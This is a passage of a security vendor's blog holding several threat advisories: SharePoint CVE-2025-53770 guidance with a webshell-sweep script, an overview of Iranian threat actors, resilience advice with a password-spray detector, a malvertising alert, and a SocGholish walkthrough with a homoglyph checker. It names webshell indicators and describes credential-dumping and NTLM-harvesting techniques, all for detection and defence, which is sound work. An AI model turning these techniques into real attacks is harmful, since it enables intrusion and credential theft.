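    "2025-07-21 03:14:07 src=10.0.0.5 dst=203.0.113.20 dport=443 action=allow",
    "2025-07-21 03:14:09 src=107.191.58.76 dst=10.0.0.12 dport=443 action=allow",
    "2025-07-21 03:15:01 src=10.0.0.12 dst=96.9.125.147 dport=443 action=allow",
]


def build_demo_layouts() -> Path:
    """Create a throwaway stand-in for LAYOUTS: one old legitimate page, one
    benign script, and an empty file carrying a known-bad name (no webshell
    content is needed to exercise the name and recency rules)."""
    d = Path(tempfile.mkdtemp(prefix="layouts_demo_"))
    legit = d / "default.aspx"
    legit.write_text("<%@ Page Language=\"C#\" %>")
    old = (datetime.now(timezone.utc) - timedelta(days=400)).timestamp()
    os.utime(legit, (old, old))              # installed long ago: not flagged
    (d / "core.js").write_text("// benign")
    (d / "spinstall0.aspx").write_text("")   # placeholder with an IoC file name
    return d


if __name__ == "__main__":
    for f in sweep_layouts(build_demo_layouts()):
        print(f["path"], f["reasons"])
    for line in scan_connection_log(SAMPLE_LOG):
        print("IoC hit:", line)
```

    Run it against the real LAYOUTS directory by calling sweep_layouts() with no arguments on the SharePoint host; a hash hit is a confirmed indicator, while a name or recency hit is a prompt to inspect the file. Either way, a match means the machine keys must be rotated as described above, not just the file removed.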

    What to Do

    If you have on-prem Microsoft SharePoint Server running 2016, 2019, or Subscription Edition versions, you should patch immediately. Considering the criticality of this vulnerability, it is advised to perform out-of-band patching and not wait for a regular patch cycle.


    No action is required if you are using Microsoft 365-based SharePoint Online versions, as these are not impacted.


    At this time, there are no official workarounds. Patching is the only guaranteed mitigation. If you are absolutely unable to patch, consider temporarily disabling public access to your on-prem SharePoint servers. Some WAF rules may also be able to provide additional protection. As an additional mitigation step, Microsoft has recommended enabling Antimalware Scan Interface (AMSI).

    Who’s Impacted

    • On-premises deployments of Microsoft SharePoint Server 2016, 2019, and Subscription Edition

    When Will Microsoft Fix It

    As of July 20th, 2025, Microsoft has released emergency patches to address CVE-2025-53770 and CVE-2025-53771.

    Release date | Product | Article | Download
    Jul 20, 2025 | Microsoft SharePoint Server Subscription Edition | Details | Security Update
    Jul 20, 2025 | Microsoft SharePoint Server 2019 | Details | 5002753, Security Update: https://www.microsoft.com/en-us/download/details.aspx?id=108287
    Jul 20, 2025 | Microsoft SharePoint Enterprise Server 2016 | 5002760 | 5002759, Security Update: https://www.microsoft.com/en-us/download/details.aspx?id=108289


    Some additional items of note from Microsoft’s documentation in regards to patching these vulnerabilities:

    Are the two new CVEs that were released related to the two SharePoint vulnerabilities that were documented by CVE-2025-49704 and CVE-2025-49706?

    Yes, the update for CVE-2025-53770 includes more robust protections than the update for CVE-2025-49704. The update for CVE-2025-53771 includes more robust protections than the update for CVE-2025-49706.


    There are multiple update packages available for some of the affected software. Do I need to install all the updates listed in the Security Updates table for the software?

    Yes. Customers should apply all updates offered for the software installed on their systems. If multiple updates apply, they can be installed in any order.

    How Blumira Can Help

    Update - 7/29/25 - A new detection has been released to alert on newly created aspx files in the Microsoft SharePoint layouts directory. This detection is titled, "CVE-2025-49704 SharePoint Suspicious Web Shell File Created in LAYOUTS Directory" and is enabled by default.


    For Blumira customers, two default-enabled Blumira detections would catch the webshell activity specific to the exploits mentioned in this article:

    • Webshells by File Write

    • Potential IIS Webshell Activity

    Additionally, we are working to see what other detection opportunities exist based on the tactics, techniques, and procedures we’ve observed related to these CVEs and will be sure to update this post as new detections are created and released.

    Low
    July 2, 2025

    The Iranian Cyber Threat: Key Insights for IT Teams

    Although there is currently a ceasefire in place, geopolitical tensions between the United States and Iran continue to escalate.

    Although there is currently a ceasefire in place, geopolitical tensions between the United States and Iran continue to escalate. As a result, we're witnessing a corresponding surge in Iranian-sponsored cyber activity targeting American organizations. Recent U.S. military strikes on Iranian nuclear facilities have prompted the Department of Homeland Security to issue warnings about heightened cyber threats from Iranian hacktivists and state-affiliated groups.


    The data we're seeing from both our customer environments and research infrastructure tells a clear story: cyber operations from nation states like Iran are becoming more sophisticated, coordinated, and persistent.

    Our Research Into the Current Threat Landscape

    The Scale of Iranian Cyber Activity

    Blumira provides a security operations platform for over 18,000 organizations to find and address threats and risks in their environment. Over the past 21 months, we've tracked 824 security incidents targeting our customers that can be attributed to Tactics, Techniques, and Procedures (TTPs) by Iranian cyber actors and Iranian-sourced networks. This sustained campaign included 383 RDP brute force attempts, 27 SSH attacks, and 414 web application scans, all originating from 67 unique Iranian IP addresses.


    What makes this particularly concerning isn't just the volume but the timing and coordination. Our publicly-exposed security research lab has been monitoring Iranian reconnaissance patterns since June 2024, and the correlation between cyber activity spikes and geopolitical events is unmistakable:


    March 18-19, 2025: Our highest-ever recorded Iranian activity, with over 25,000 connections in a single day, coinciding with the DieNet hacktivist campaign that successfully targeted 61 U.S. organizations


    February 6, 2025: A 30x increase in baseline activity following U.S. sanctions on Iranian IRGC officials


    January 30, 2025: The first major spike of 2025, aligning with new administration policy changes

    These aren't random port scans or opportunistic attacks. They represent systematic intelligence gathering that military strategists call "preparation of the battlefield."

    Evolution of Iranian Tactics

    Iranian cyber groups have evolved considerably over the past two years. We're tracking several key Advanced Persistent Threat (APT) groups:


    APT33 (Elfin Team, Refined Kitten, HOLMIUM, Peach Sandstorm) has expanded beyond traditional espionage to focus on satellite communications and critical infrastructure. In May 2024, they successfully compromised a U.S. swing state government entity, demonstrating their capability to target election infrastructure.

    APT34 (OilRig, Helix Kitten, Hazel Sandstorm) is an Iranian threat group that has targeted various sectors, including financial, government, energy, chemical, and telecommunications, since at least 2014.

    APT35 (Magic Hound, Charming Kitten, Phosphorus) has incorporated AI-enhanced social engineering techniques and continues to focus on aerospace and critical infrastructure sectors.

    MuddyWater (Seedworm, Static Kitten, TEMP.Zagros) adopted the sophisticated DarkBeatC2 command-and-control framework in 2024, significantly enhancing their operational capabilities.

    CyberAv3ngers (Soldiers of Solomon), affiliated with Iran's Islamic Revolutionary Guard Corps, specializes in targeting industrial control systems, particularly water infrastructure and Israeli-made Unitronics PLCs.

    Recent TTPs linked to Iranian cyber actors

    2016-2017

    HBO breach (2017) - Iranian hackers stole unreleased content including Game of Thrones episodes

    Dam control system intrusion (2016) - Iranian hackers gained access to Bowman Avenue Dam control systems in New York


    2018-2019

    Global oil and gas targeting (2018-2019) - APT33/Elfin targeted aviation and energy sectors worldwide

    DNSpionage campaign (2018-2019) - DNS hijacking attacks targeting government and private sector entities

    Telecommunications infrastructure attacks (2019) - Attacks targeting telecom providers in multiple countries


    2020-2021

    Water treatment facility attacks (2020-2021) - Attacks targeting water infrastructure in Israel and potentially the U.S.

    Ransomware operations surge (2020-2021) - Groups like Pay2Key and others linked to Iranian operations

    Microsoft Exchange exploitation (2021) - Iranian groups were among those exploiting ProxyLogon vulnerabilities


    2022-2024

    Albania government systems (July 2022) - Major attack disrupting government services

    Critical infrastructure targeting (2022-2023) - Continued focus on water, energy, and transportation sectors

    Election interference activities (2020, 2024) - Attempts to influence US elections through various means

    Industries at Highest Risk

    Our analysis shows Iranian actors are particularly focused on several key sectors:


    • Healthcare and Public Health: Often targeted due to the critical nature of these services and potential for causing public alarm. Additionally, there is value in healthcare data on the open market as well as for intelligence purposes.

    • Energy and Utilities: Including power generation, oil/gas infrastructure, and water systems. These industries are often identified as having more attack surface facing the internet due to historical under-investment in IT.

    • Government and Defense: Federal, state, and local government entities, along with defense contractors. From the city you live in all the way up to the state and federal level, different groups of people are trying to secure and defend different networks, and all of them hold valuable data.

    • Information Technology: Cybersecurity companies and IT service providers (like us) are priority targets for their access to multiple downstream customers. Validate your interconnections with your providers, and make sure you know what could happen if they get hit - do a tabletop exercise!

    • Financial Services: Banking, investment firms, and payment processors. These are perfect targets for generating revenue. In 2016, North Korea’s Lazarus Group almost stole $1B from a Bangladeshi bank but failed due to a variety of circumstances.

    • Education: Universities and research institutions, particularly those with government research contracts, hold data that is valuable both for manufacturing and for resale.

    If your organization operates in any of these sectors, you should assume you're being actively considered by Iranian threat actors.

    What to Do Next

    The current conflict represents more than just another geopolitical crisis; it's a demonstration of how modern conflicts play out in cyberspace. And while the threat is real, it's not insurmountable: with the right preparation, tools, and expertise, organizations can build the resilience needed to withstand even nation-state attacks. The question isn't whether your organization will face disruptive events, whether by threat actors or acts of nature; it's whether you are prepared.


    The key is to move beyond a purely defensive mindset and toward a proactive security posture. Instead of trying to build perfect walls around your organization, focus on building the capability to quickly detect risky and suspicious activity, understand what that activity represents, and respond effectively to mitigate and maintain operations.

    How Blumira Can Help

    We believe security shouldn't be about fear — it should be about building operational resilience. While nation-state threats like those above can seem overwhelming, our approach focuses on building security operations that keep the business running smoothly by focusing on addressing risk holistically, not just detecting the next threat. We provide visibility where it matters most, actionable guidance when you need it, and human expertise when critical issues arise – because we're passionate about helping the people behind the technology who keep their organizations safe every day.


    Ready to strengthen your cyber defenses? Read our post about what you can do today to help protect your organization against cyber threats and build the operational resilience you need for the modern threat landscape.


    This analysis is based on security intelligence gathered from our anonymized customer environments and research infrastructure. All data shared comes from legitimate security research operations designed to improve community threat intelligence and help organizations better defend against advanced threats.
    Low
    July 2, 2025

    What Iran-Based Activity Can Teach Us About Everyday Security Resilience

    The recent escalation with Iran has put security teams on high alert. The research we recently published demonstrates that Iran-based threat actors have continued to evolve their tactics over the last 21 months, specifically targeting critical infrastructure, government contractors, and organizations connected to national security. This trend is much larger than just Iran’s tactics, however: nation-state threat actors around the world are increasingly picking on supply chain targets versus military or government systems directly, because these much smaller organizations typically have less robust defenses.


    Ok, that’s the scary news. Here’s the good news: while geopolitical tensions certainly amplify certain risks, the fundamentals of good security remain unchanged. What changes is our level of vigilance and readiness, and the same mitigation strategies that help address nation-state threats can address other threats and risks to your organization.

    Beyond Threats: Building Operational Resilience

    When we built our security operations platform, we started with a simple premise: perfect defense is impossible, but effective resilience is very achievable.

    Operational resilience helps you plan for the unplannable by recognizing that on a long enough timeline, incidents are inevitable. However, you can mitigate the risk they pose and minimize disruption by focusing your efforts on building an environment where you can immediately spot unusual activity across your systems, understand what's happening quickly in order to respond appropriately, and recover to get back to business without missing a beat. This approach is key, regardless of whether you're facing a nation-state actor, a criminal organization, or an insider threat. The source of a risk or threat matters less than your ability to detect comprehensively, understand rapidly, and respond like a pro.

    Visibility Changes Everything

    The most dangerous attacks aren't necessarily the most sophisticated or rare – they're the ones you don't see until the damage is done. Iranian threat actors, like many other advanced groups, rely on this awareness gap in their operations. They gain initial access through relatively straightforward means like phishing, exposed services, or credential theft, and then move laterally throughout your environment while staying under the radar and looking for opportunities to borrow or elevate their level of access.

    Traditional security tools built for a perimeterized environment where external traffic is scrutinized but internal access is much more easily granted and retained are insufficient. Firewalls and antivirus might stop an initial breach attempt, but what happens when an attacker is already inside your network?

    This is why continuous monitoring across your entire environment matters so much. When you can connect the dots between seemingly isolated events, such as a suspicious login here, or an unusual file access there, patterns emerge that would otherwise remain unseen. Quickly identifying abnormal activity starts with a comprehensive picture of what normal looks like.

    An Integrated Strategy for Detection and Response

    As GI Joe told us decades ago, knowing is half the battle: continuous monitoring helps to identify what’s happening in an environment, but effective security relies on being able to respond and do something about what you’ve seen. Response without proper context or practice (better described as “reacting”) can often cause more harm than good. A truly integrated approach combines three key elements:

    1. Comprehensive visibility brings together data from across your entire digital landscape – endpoints, network, cloud services, and applications – to capture a complete picture of your environment. This holistic view allows you to spot connections between events that might seem unrelated when viewed in isolation. Remember that “visibility” and “awareness” aren’t synonyms, though: capturing the full picture is important, but quickly identifying suspicious activity depends on solid threat detection that identifies attacker behaviors early, such as flagging scanning activity before a successful exploit occurs.
    2. Contextual understanding transforms raw data into meaningful insights. When an alert fires, you need to immediately understand what happened, why it matters, and what systems are affected. Context separates actual threats from the background noise that plagues many security teams.
    3. Flexible response options are critical for addressing different types of security findings. Some clearly-malicious signals can be quickly addressed through automated containment. Others require deeper triage and investigation, along with the guidance of well-documented response playbooks. And sometimes, you need direct support from security experts who can walk you through complex incidents.

    The secret sauce is having all three approaches in your metaphorical spice rack (automated, guided, and supported) so you can address each finding proportionately based on its nature and severity.

    Practical Steps to Strengthen Your Security Posture

    So, if the latest in world news has you nervously reassessing your security strategy, here are some concrete steps you can take toward resilience and some peace of mind:

    Shore Up Your Fundamentals

    Take a fresh look at your environment with an eye toward what threat actors are most likely to target. In our research on attacks from Iran, the most likely targets are valuable data sources (whether healthcare, financial, confidential, or proprietary) and availability services, alongside third-party attacks specifically targeting a client/vendor of the intended victim. Free resources like the CSF Quick Start Guides can provide structure to this assessment and help you start with the most important systems and data. Once identified, start by patching external-facing systems that might be most exposed to scanning and exploitation, as these systems often serve as the initial entry point for attackers.

    Review your remote access solutions like VPN and RDP configurations. Remote access services (including commercial RMMs) are prime targets because they provide direct entry to your network when compromised. Ensure they're properly configured, using current protocols, and restricted to only those who truly need them. Then monitor for suspicious activity (like password failures in a short period that could indicate a spraying attack) to catch anything else.
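    The monitoring suggested above, as an added example rather than Blumira's own detection logic: it distinguishes a spraying pattern (one guess against many accounts from one source) from classic brute force (many guesses against one account) over a sliding time window. The log lines are constructed in a simplified "timestamp src=… user=… result=…" form; in practice the same logic would run over Windows Security event 4625 or the VPN or RDP gateway's failed-login records, and the thresholds are assumptions to tune against your own baseline.

```python
"""Flag authentication-failure bursts on a remote access service.

Added example, not Blumira's detection logic. Log lines use a simplified
'timestamp src=... user=... result=...' form constructed below; in practice
the same logic would run over Windows Security event 4625 or the VPN
gateway's failed-login records. Thresholds are assumptions, not vendor defaults.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_line(line: str):
    """Parse one constructed log line; return None for lines we can't read."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "src": m["src"], "user": m["user"], "ok": m["result"] == "SUCCESS"}


def detect_auth_bursts(lines, window=timedelta(minutes=5),
                       spray_min_users=8, brute_min_fails=5):
    """Group failures by source and slide a time window over them.

    Many distinct accounts failing from one source inside the window looks like
    password spraying (one guess per account); many failures against a single
    account from one source looks like classic brute force. Each is reported
    once per source and kind, keyed on the first window that crossed the bar."""
    failures = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and not ev["ok"]:
            failures[ev["src"]].append(ev)

    findings = {}
    for src, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            per_user = defaultdict(int)
            for e in in_window:
                per_user[e["user"]] += 1
            if len(per_user) >= spray_min_users:
                findings.setdefault((src, "password_spray"), {
                    "src": src, "kind": "password_spray",
                    "distinct_users": len(per_user), "failures": len(in_window),
                    "window_start": start["ts"].isoformat(),
                })
            user, count = max(per_user.items(), key=lambda kv: kv[1])
            if count >= brute_min_fails:
                findings.setdefault((src, "brute_force"), {
                    "src": src, "kind": "brute_force", "target": user,
                    "failures": count, "window_start": start["ts"].isoformat(),
                })
    return list(findings.values())


def constructed_auth_log():
    """Build sample lines: a spray, a brute-force run, and one benign typo.
    198.51.100.0/24 and 203.0.113.0/24 are documentation ranges, not real sources."""
    base = datetime(2025, 6, 30, 8, 0, 0, tzinfo=timezone.utc)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = []
    for i in range(12):                                   # spray: 12 accounts, 1 guess each
        t = base + timedelta(seconds=10 * i)
        lines.append(f"{t.strftime(fmt)} src=198.51.100.7 user=user{i:02d} result=FAIL")
    for i in range(8):                                    # brute force: 8 guesses at 'admin'
        t = base + timedelta(minutes=1, seconds=15 * i)
        lines.append(f"{t.strftime(fmt)} src=203.0.113.9 user=admin result=FAIL")
    t = base + timedelta(minutes=3)                       # benign: one typo, then success
    lines.append(f"{t.strftime(fmt)} src=10.0.0.4 user=alice result=FAIL")
    t += timedelta(seconds=20)
    lines.append(f"{t.strftime(fmt)} src=10.0.0.4 user=alice result=SUCCESS")
    return lines


SAMPLE_AUTH_LOG = constructed_auth_log()

if __name__ == "__main__":
    for f in detect_auth_bursts(SAMPLE_AUTH_LOG):
        print(f)
```

    The single benign failure never crosses either threshold, which is the point of counting per source and per window rather than alerting on every failed login: the signal is the shape of the failures, not their existence.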

    Strong authentication is your best defense against credential-based attacks. Implement multi-factor authentication wherever possible, especially for administrative accounts. Even if passwords are compromised, MFA provides an additional barrier that raises the level of difficulty for attackers to overcome. How do we know that strong authentication is doing its job? After literal decades at the top of the list, stolen/reused credentials are dropping in the rankings of most common attack vectors, while session token theft (which can sidestep MFA by stealing already-authenticated legitimate access) is now on the rise.

    These fundamentals may not be glamorous, but they're consistently effective against even sophisticated threat actors. The most successful attacks often exploit basic security gaps rather than employing advanced techniques.

    Enhance Your Visibility

    You can't protect what you can't see. Comprehensive logging forms the foundation of effective security monitoring, and a quality Security Information and Event Management tool (SIEM) that collects and analyzes logs across your entire tech stack makes it Grand Central Station for knowing what’s happening. Ensure you're collecting logs from all critical systems – servers, firewalls, cloud services, and key applications. Many successful attacks go undetected simply because the affected systems weren't being monitored, and many attacks have succeeded in “secure” environments by targeting the edge case or entrenched legacy hardware that isn’t supported for integration.

    Work on establishing baseline behaviors in your environment. When you understand what normal activity looks like, unusual patterns become much easier to spot. Pay particular attention to privileged account usage, as administrator accounts are prime targets for attackers seeking to expand their control. Historical activity isn’t just reference material for an investigation; it’s a readout over time of your environment’s health and risk factors – make the most of it!

    Look for ways to correlate events across different systems. The most dangerous attacks don’t usually appear as one big noisy event – instead, they can be identified by activity patterns that could be harmless on their own but collectively show an attacker’s intent. Event correlation helps you see these patterns before things fall apart.

    Finally, implement intelligent continuous monitoring rather than relying on time-intensive, costly “eyes on glass” analysis for detections. Cybercrime isn’t a 9-to-5 kind of gig, which means security can’t be, either.

    Prepare Your Response

    When incidents occur, confusion and delay can result in more damage than the initial attack itself. Incident response planning is about building capacity before you need it, so you can respond decisively and confidently when events occur.

    Document clear workflows for common scenarios, including who needs to be notified, which immediate actions should be taken and who is responsible for taking them, and how decisions will be made. Maintaining clear communications and avoiding duplicated (or contradictory) efforts is one of the trickiest elements of response planning, so define communication channels and decision-making authority in advance.

    Consider conducting tabletop exercises that simulate security incidents, which you can take from actual previously-detected activity or major headlines that could similarly affect your own organization. These practice sessions help identify gaps in your plans and build muscle memory for responding to real events. They're also excellent opportunities to bring technical and business teams together to establish shared understanding and expectations. A plan isn’t really a plan until it’s been tested, so make sure your response playbooks are road-tested and not just theoretical.

    Speaking of “road-tested,” test your backup and recovery processes regularly to ensure they actually work when needed. Many organizations discover too late that their backups or restoration processes are incomplete. In many scenarios including ransomware attacks, reliable backups often make the difference between a major disruption and a close call.

    Stay Informed…Within Reason

    Whether a doctor on-call for emergencies, an IT administrator on-call for outages, or any person who simply has too many phone apps, too much information can be harmful, thanks to the effects of alert fatigue. When everything is categorized as an emergency, nothing actually gets treated as an emergency. This doesn’t just apply to dashboards but to our own information diet as well – threat intelligence is valuable, but information overload can be paralyzing. Focus on following trusted sources that provide clear, contextualized, and actionable intelligence rather than trying to keep up with every new article in every feed. Quality matters much more than quantity when trying to stay up-to-date on current risks.

    While we’re at it, remember that networks aren’t just for computers – industry peer groups can be incredibly helpful and provide early warnings about emerging threats targeting organizations like yours. Contributing to and leveraging these resources can help you prepare before being directly targeted.

    Practice the skill of translating general security advisories into specific actions for your environment. Not every threat applies to every organization, and prioritization is essential for making the most of limited security resources – that includes reactive prioritization to emergent threats, as well as proactive prioritization of risks to your operational resilience. Focus on addressing the risks most relevant to your specific business conditions.

    Remember that security is a journey, not a set destination – continuous improvement is the name of the game, and your focus should be on strategic evolution rather than complete re-invention. If you start with your most critical risks and measure success through incremental progress, you’ll find your operational resilience will steadily grow over time.

    Finding the Right Strategy for Where You Are, Right Now

    Security isn’t just about technology; it’s about building resilience to whatever challenges come our way. Whether you’re concerned about nation-state threat actors or everyday risks, the foundations of a good security practice remain the same: get visibility into what’s happening in your environment, gather the context to understand what it means, and have a clear plan to respond when something goes sideways. That’s not just good security – it’s also good business!

    Immediate Actions You Can Take

    1. Conduct a Vulnerability Assessment

    Given the increased threat activity, now is the time to conduct a comprehensive vulnerability scan of your network infrastructure (Tip: you can get started right away with our free Domain Security Assessment). Iranian actors are particularly adept at exploiting outdated systems and unpatched software. Focus on:

    • Internet-facing systems and services
    • Remote access solutions (RDP, VPN, SSH)
    • Web applications and databases
    • IoT and operational technology devices

    2. Strengthen Access Controls

    • Implement multi-factor authentication (MFA) for all remote access, especially RDP and SSH
    • Review and update access permissions to ensure users only have the minimum access necessary
    • Monitor for credential harvesting and unusual authentication patterns
    • Consider implementing zero-trust architecture principles

    3. Enhance Monitoring and Detection

    • Deploy comprehensive logging across all systems and network devices
    • Implement network segmentation to limit lateral movement
    • Monitor for Iranian IP ranges and known indicators of compromise
    • Establish baseline network behavior to identify anomalous activity

    4. Prepare Your Incident Response

    • Update incident response plans to account for nation-state threats
    • Conduct tabletop exercises simulating Iranian attack scenarios
    • Establish communication protocols for coordinating with law enforcement and industry partners
    • Ensure backup and recovery systems are isolated and regularly tested

    5. Stay Informed

    • Subscribe to threat intelligence feeds that track Iranian cyber activity
    • Monitor geopolitical developments that might trigger increased cyber activity
    • Participate in information sharing with industry peers and government agencies
    • Regularly review and update security policies based on evolving threats

    Now It’s Your Move – But We Can Help!

    At Blumira, we've built our security operations platform specifically to address these challenges. Our solution provides:

    • Immediate deployment with hundreds of pre-built threat detection rules, so you only see alerts that are worth your time and you can focus on what matters
    • Hybrid support combining guided, automated, and expert-supported security analysis and response
    • Real-time threat intelligence incorporating the latest Iranian Tactics, Techniques, and Procedures (TTPs) and indicators
    • Customized recommendations based on your specific industry and threat profile, with best-practice playbooks that help you respond to any new finding like a pro

    Medium
    May 29, 2025

    Suspicious Code Alert: Recipe App Hijacks Credentials and Appears to Establish C&C Connection

    Over the last 2 weeks, we have observed a spike in what appears to be malvertising. Customers have noted downloading a file after clicking on a sidebar ad in a news article, which then led to command and control and browser credential stealing behaviors. The advertisement and website (VirusTotal) claims to help find recipes to count calories for various food items. That said, over 80% of customers we’ve observed responding to this same event are related to the healthcare industry.

    Additional Details

    Observations note that upon downloading the file “Recipe Lister,” the file unzips and drops another larger executable file “Recipe Finder - Recipe Lister,” followed by additional DLLs. We’ve observed consistent file paths for this output as:

    C:\Users\<user>\AppData\Local\Temp\<7-char>.tmp\7z-out
    C:\Users\<user>\AppData\Local\Temp\2w1rXpxZnwDUwuTeNvdD6FUkeI0

    This then leads to repeated network connections to suspicious or negatively reputed IP addresses (VirusTotal and VirusTotal). We’ve also noticed file creation time changes, which is consistent with timestomping behavior (T1070). Customer feedback has noted command and control traffic followed by theft of browser credentials while responding to this event. The software also appears to use NSIS plugins and to rely on DLL side-loading techniques (T1574 | VirusTotal Hash).

    Finally, we observed it reaching out to varying domains across the events. These appear odd or suspicious, some carry malicious IP reputations, and the domains are also newly registered.

    Recommendations

    Overall, this software seems highly suspicious at the least. The events observed and customer feedback appear consistent with a malicious advertising campaign (T1583). Additional sandbox reports like Any.Run’s report or Joe’s Sandbox report indicate suspicious and malicious conclusions, which appear consistent with our current observations and analysis.

    We recommend blocking the following hashes, IPs and domains where you are able to do so:


    Medium
    May 1, 2025

    SocGholish Coming Into Focus for Blumira

    You may be familiar with SocGholish (MITRE S1124), a malicious fake browser update used to spread malware through javascript downloads. Blumira has been following this malware for some time, and this walkthrough is a summary of our recent observations based on detections and logs from our agent on a single lab device.

    Ransomware

    Overview & Background

    Early in 2025, we began to see a recurrence of suspicious file executions. These were the outcome of users downloading fake updates from compromised websites, silently giving an attacker initial access. When users downloaded and executed these fake updates, they unknowingly launched malware on their systems. Fortunately, we observed several customers whose layered security measures automatically intercepted and blocked these attacks, halting any further exploitation. One particularly notable exploit caught our attention: after installation, it remained dormant for a brief period before exhibiting clear indicators of early-stage ransomware activity. Thankfully, all organizations that we observed in these cases were promptly alerted and able to respond in a timely and effective manner to contain and eradicate the attackers. Soon after reviewing the attack chains, the exploit observed appeared very similar to a new campaign of SocGholish malware leading to Ransomhub ransomware execution.

    SocGholish has been active since 2017 and is operated by the initial access broker (IAB) Mustard Tempest (TA569). The malware has been pretty extensively documented as it has evolved over time. The use of “watering hole” (drive-by-compromise) attacks for initial access has been very effective, making it a popular malware. Many users never even realize they downloaded fake updates from a compromised website. In fact, the Center for Internet Security noted that it was observed as the top malware in Q4 of 2024 (CIS Blog).

    Identifying the Attack

    Initially, we observed malicious JavaScript executions (MITRE T1059.007) containing SocGholish payloads. Our detections generated findings based on known suspicious file executions that alerted on the JavaScript files’ behaviors, allowing customers to take quick action on the infections before they spread. These files didn’t show as malicious when checked against VirusTotal at the time of the alerts but were communicating with a “.top” domain and known malicious IP infrastructure. Companies that had additional controls like DNS filtering in place had quick and often automated response actions for these initial access attacks: files were either killed/quarantined or the communicating domains were blocked immediately. This allowed customers to respond with some peace of mind.

    While SocGholish typically steals information, installs remote access tools, and occasionally leads to ransomware, we observed a particularly concerning case. A JavaScript file with unique characteristics was downloaded and executed, triggering a chain of increasingly suspicious activities. Although the file immediately generated an alert, it was initially dismissed as benign (demonstrating how effective these types of watering-hole attacks can be).

    The first interesting observation was that this file was an ‘Update[.]js’ download (similar to the file names previously observed), but it was obfuscated as a homoglyph attack (the raw filename actually reads as ‘Updаte.js’). Homoglyph attacks use special characters (or visually-similar characters from other languages) to spoof text that appears normal to human readers, while bypassing security filters that might otherwise trigger an alert/response (VirusTotal Link). Additionally, this file has a reputation of utilizing “long sleeps,” which is a way that malware avoids sandboxing and evades antivirus. Essentially, it is a delayed activation (lying dormant) for a period of time before beginning to carry out any objectives.
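    To make the homoglyph point concrete, here is an added example (not code from the post or from Blumira) that inspects a download file name for mixed scripts and non-ASCII letters and compares a normalised "skeleton" against a blocklist, so that the spoofed ‘Updаte.js’ (Cyrillic а, U+0430) is caught where exact matching on "Update.js" misses it. The confusables table is a constructed subset used for illustration.

```python
import unicodedata

# Cyrillic lowercase letters whose glyphs are indistinguishable from Latin ones in
# common fonts. Constructed subset for the example; a production filter would load
# the full Unicode confusables table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
}


def script_of(ch: str) -> str:
    """Coarse script label from the Unicode character name: LATIN, CYRILLIC, ..."""
    if not ch.isalpha():
        return "COMMON"
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def skeleton(filename: str) -> str:
    """Replace known confusables with their Latin look-alikes."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in filename)


def homoglyph_report(filename: str) -> dict:
    """Describe why a file name is (or is not) a homoglyph candidate.

    Mixed scripts or any non-ASCII character in a name that is supposed to be a
    plain Latin file name such as Update.js is what the analyst wants surfaced.
    """
    scripts = {script_of(ch) for ch in filename if ch.isalpha()}
    non_ascii = [
        (idx, ch, unicodedata.name(ch, "?"))
        for idx, ch in enumerate(filename)
        if ord(ch) > 0x7F
    ]
    return {
        "filename": filename,
        "skeleton": skeleton(filename),
        "scripts": sorted(scripts),
        "mixed_script": len(scripts) > 1,
        "non_ascii": non_ascii,
        "suspicious": len(scripts) > 1 or bool(non_ascii),
    }


def matches_blocklist(filename: str, blocklist) -> bool:
    """Exact string matching misses the spoofed name; matching on the skeleton does not."""
    wanted = {entry.lower() for entry in blocklist}
    return skeleton(filename).lower() in wanted


if __name__ == "__main__":
    spoofed = "Upd\u0430te.js"  # the 'a' is U+0430 CYRILLIC SMALL LETTER A
    print(homoglyph_report(spoofed))
    print("exact match:", spoofed == "Update.js",
          "skeleton match:", matches_blocklist(spoofed, ["Update.js"]))
```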

    In this case, the alert was closed as benign. About 18 hours later, additional suspicious activity started generating alerts on the same host. This delay lines up with the “long sleeps” tactic, and after this dormancy, reconnaissance activity began. Alerts for ADFind (MITRE T1087.002) and Nltest (MITRE T1482) were promptly triggered, minutes apart on the same host. These sequential alerts signaled an evolving attack chain and promptly notified the customer, who isolated the compromised host and took response measures before any data exfiltration or ransomware execution could occur. This rapid intervention and mitigation were crucial in preventing a potentially devastating breach.

    We observed additional maneuvers following the ADFind and Nltest activity that were particularly interesting. There was a new communicating domain (VirusTotal Link) not yet seen, unlike the “.top” domains. We then saw network connections from pythonw.exe, which had been downloaded, unpacked into and executed from the ProgramData folder. These connections communicated with the now-known Ransomhub Python C2 infrastructure (VT IP Link), which, at the time of this exploit, did have malicious reputations on VirusTotal. Amidst this activity, PowerShell commands ran that first created scheduled tasks for persistence and then attempted to dump and decrypt credentials from browsers, saving them to a rad<5-hex-chars>.tmp file (MITRE Link).

    In their Threat Detection Report, RedCanary noted a specific "activity cluster" that involved SocGholish intrusions leading to Ransomhub activity. The attack chain is incredibly similar to what is reported in this TrendMicro article that was published after this particular attack. This additional "activity cluster" also noted credential harvesting via NTLM hashes, using a PowerShell command that looks for Outlook signature files and adds HTML code, including a link to an image file hosted in the attacker's infrastructure (NCC Group Article Link). According to RedCanary, "Once in place, when someone opens an email from the affected user...the recipient's email client may attempt to authenticate to the adversary infrastructure...enabling the adversary to harvest hashed credentials." A PowerShell command was also observed (MITRE T1187) related to this forced authentication/credential harvesting through Outlook.

